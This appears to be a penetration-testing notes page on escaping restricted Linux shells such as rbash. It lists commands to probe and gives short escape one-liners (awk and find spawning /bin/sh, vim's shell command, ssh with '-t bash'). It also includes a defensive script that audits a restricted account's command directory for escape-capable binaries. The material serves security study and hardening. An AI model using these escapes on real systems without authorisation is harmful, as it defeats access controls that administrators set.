# Escaping Restricted Shells

First, check which commands we can execute.\
Try running a variety of commands.

```sh
awk 'BEGIN {system("/bin/sh")}'
bash
cat
cd
cp
declare
echo
echo $PATH
echo $SHELL
echo /usr/bin/*
echo /home/<username>/bin/*
echo "bash -i" | tee rbypass.sh
ed
env
export
expect
find
find / -name foobar -exec /bin/sh \;
ftp
git
less
more
man ls
pinfo ls
links
lynx
mutt
ls
nano
nmap
ne
printenv
printf
# List all files in the current directory, including dotfiles (zsh glob qualifier)
printf '%s\n' *(D)
pwd
set
sudo
sudo -l
tar
touch
vi
vim
whereis
which
whoami
zip

# Programming languages
perl
php
python
python2
python3
python3.x
ruby

# Commands with absolute path
/bin/bash
/bin/sh
/usr/bin/cat
/usr/bin/ls


# Special characters
>
>>
<
|
&
$
$(whoami)
;
:
'
"
`
```

Some commands can be abused (check GTFOBins). Example: `vim`

`vim`

`:set shell=/bin/sh`

`:shell`


More at:

{% embed url="<https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/>" %}

{% embed url="<https://blog.certcube.com/restricted-shells-escaping-techniques/>" %}

When the shell only allows us to execute the `ls` command with a specific set of arguments, such as `ls -l` or `ls -a`:

```shell-session
ls -l `pwd` 
```

## rbash

Add `-t bash` to the SSH connection command


{% embed url="<https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf>" %}
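
The commands above only help when they are reachable from the restricted account, so the directory its `PATH` points to (for example `/home/<username>/bin`) is worth auditing. The script below is an added example, not part of the original page: it flags entries whose name or symlink target is one of the escape-capable commands listed on this page. The list contents, the function names and the sample tree are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit the command directory of a restricted-shell account.
# Assumption: this list is taken from the commands named on this page that can
# start another program (shells, interpreters, editors, pagers, find, tar ...).
ESCAPE_CAPABLE="awk bash sh ed env expect find ftp git less more man pinfo links
lynx mutt nano nmap ne tar vi vim zip perl php python ruby sudo"

# True if NAME is on the list; versioned names (python3.11, vim.basic) also match.
is_escape_capable() {
    for bad in $ESCAPE_CAPABLE; do
        case $1 in
            "$bad"|"$bad"[0-9.]*) return 0 ;;
        esac
    done
    return 1
}

# Print "entry -> resolved target" for every risky entry in DIR.
# Both the entry name and the basename of its symlink target are checked, so a
# renamed link (edit -> vim) is still reported. Exit status 1 means findings.
audit_restricted_bin() {
    found=0
    for entry in "$1"/*; do
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        target=$(readlink -f "$entry" 2>/dev/null) || target=$entry
        if is_escape_capable "$(basename "$entry")" ||
           is_escape_capable "$(basename "$target")"; then
            printf '%s -> %s\n' "$(basename "$entry")" "$target"
            found=1
        fi
    done
    [ "$found" -eq 0 ]
}

# Constructed sample tree (not a real system): fake binaries plus an rbin/
# directory such as a restricted PATH would point at. Prints the tree root.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/bin" "$root/rbin"
    for b in ls cat vim python3.11 find; do : > "$root/usr/bin/$b"; done
    for b in ls cat find; do ln -s "../usr/bin/$b" "$root/rbin/$b"; done
    ln -s ../usr/bin/vim "$root/rbin/edit"         # renamed editor
    ln -s ../usr/bin/python3.11 "$root/rbin/calc"  # renamed interpreter
    printf '%s\n' "$root"
}

sample=$(make_sample_tree)
audit_restricted_bin "$sample/rbin" || echo "review the entries above"
rm -rf "$sample"
```

On the sample tree it reports `calc`, `edit` and `find`, and leaves `ls` and `cat` alone.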

## Resources

{% embed url="<https://0xdf.gitlab.io/2020/04/30/htb-solidstate.html>" %}

{% embed url="<https://vk9-sec.com/linux-restricted-shell-bypass/>" %}

{% embed url="<https://exploit-notes.hdks.org/exploit/network/protocol/restricted-shell-bypass/>" %}
